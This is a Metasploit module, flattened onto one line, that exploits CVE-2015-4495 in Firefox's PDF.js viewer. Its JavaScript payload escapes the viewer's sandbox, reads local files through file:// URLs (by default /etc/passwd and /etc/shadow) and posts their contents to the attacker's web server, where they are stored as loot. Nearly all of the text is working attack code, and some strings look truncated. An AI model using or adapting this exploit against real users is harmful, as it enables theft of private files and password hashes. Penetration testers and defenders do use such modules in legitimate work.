## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'Firefox PDF.js Browser File Theft', 'Description' => %q{ This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR 38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with privileges to read local files. The in-the-wild malicious payloads searched for sensitive files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they do not use the Mozilla PDF viewer. }, 'Author' => [ 'Unknown', # From an 0day served on Russian news website 'fukusa', # Hacker news member that reported the issue 'Unknown' # Metasploit module ], 'License' => MSF_LICENSE, 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'References' => [ ['URL', 'https://paste.debian.net/290146'], # 0day exploit ['URL', 'https://news.ycombinator.com/item?id=10021376'], # discussion with discoverer ['URL', 'https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/'], ['CVE', '2015-4495'] ], 'DefaultAction' => 'WebServer' )) register_options([ OptString.new('FILES', [ false, 'Comma-separated list of files to steal', '/etc/passwd, /etc/shadow' ]) ], self.class) register_advanced_options([ OptInt.new('PER_FILE_SLEEP', [ false, 'Milliseconds to wait before attempting to read the frame containing each file', 250 ]) ], self.class) end def run print_status("File targeted for exfiltration: #{JSON.generate(file_urls)}") exploit end def on_request_uri(cli, request) if request.method.downcase == 'post' print_status('Got POST request...') process_post(cli, request) send_response_html(cli, '') else print_status('Sending exploit...') send_response_html(cli, html) end end def process_post(cli, req) name = req.qstring['name'] print_good("Received #{name}, size #{req.body.bytes.length}...") output = store_loot( name || 'data', 'text/plain', cli.peerhost, req.body, 'firefox_theft', 'Firefox PDF.js exfiltrated file' ) print_good("Stored to #{output}") end def html exploit_js = js + file_payload + '}, 20);' "
" end def backend_url proto = (datastore['SSL'] ? 'https' : 'http') my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}" resource = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource "#{proto}://#{my_host}#{port_str}#{resource}/catch" end def file_payload %Q| var files = (#{JSON.generate(file_urls)}); function next() { var f = files.pop(); if (f) { get("file://"+f, function() { var data = get_data(this); var x = new XMLHttpRequest; x.open("POST", "#{backend_url}?name="+encodeURIComponent("%URL%")); x.send(data); }, #{datastore['PER_FILE_SLEEP']}, "%URL%", f); setTimeout(next, #{datastore['PER_FILE_SLEEP']}+200); } } next(); | end def file_urls datastore['FILES'].split(',').map(&:strip) end def js <<-EOJS function xml2string(obj) { return new XMLSerializer().serializeToString(obj); } function __proto(obj) { return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__; } function get(path, callback, timeout, template, value) { callback = _(callback); if (template && value) { callback = callback.replace(template, value); } js_call1 = 'javascript:' + _(function() { try { open("%url%", "_self"); } catch (e) { history.back(); } undefined; }, "%url%", path); js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined'; sandboxContext(_(function() { i = document.getElementById('i'); p = __proto(i.contentDocument.styleSheets[0].ownerNode); i2 = document.getElementById('i2'); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call1); })); setTimeout((function() { sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call2); })); }), timeout); } function get_data(obj) { data = null; try { data = obj.document.documentElement.innerHTML; if (data.indexOf('dirListing') < 0) { throw new Error(); } } catch (e) { if (this.document instanceof XMLDocument) { data = xml2string(this.document); } else { try { if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') { data = this.document.body.firstChild.textContent; } else { throw new Error(); } } catch (e) { try { if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {; return null; } else { throw new Error(); } } catch (e) { ;; } } } } return data; } function _(s, template, value) { s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1]; s = s.substring(0, s.length - 1); if (template && value) { s = s.replace(template, value); } s += __proto; s += xml2string; s += get_data; s = s.replace(/\\s\\/\\/.*\\n/g, ""); s = s + ";undefined"; return s; } function get_sandbox_context() { if (window.my_win_id == null) { for (var i = 0; i < 20; i++) { try { if (window[i].location.toString().indexOf("view-source:") != -1) { my_win_id = i; break; } } catch (e) {} } }; if (window.my_win_id == null) return; clearInterval(sandbox_context_i); object.data = 'view-source:' + blobURL; window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,'; object.data = 'data:text/html,<'+'html/>'; window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', ''); } var i = document.createElement("iframe"); i.id = "i"; i.width=i.height=0; i.style='position:absolute;left:-9999px;'; i.src = "data:application/xml,